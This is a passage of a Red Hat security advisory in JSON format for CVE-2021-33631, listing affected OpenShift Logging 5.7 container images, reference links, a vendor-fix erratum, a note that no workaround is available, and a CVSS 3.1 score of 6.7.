"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-33631"
},
{
"category": "external",
"summary": "RHBZ#2261976",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2261976"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-33631",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33631"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-33631",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33631"
},
{
"category": "external",
"summary": "https://seclists.org/oss-sec/2024/q1/65",
"url": "https://seclists.org/oss-sec/2024/q1/65"
}
],
"release_date": "2024-01-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
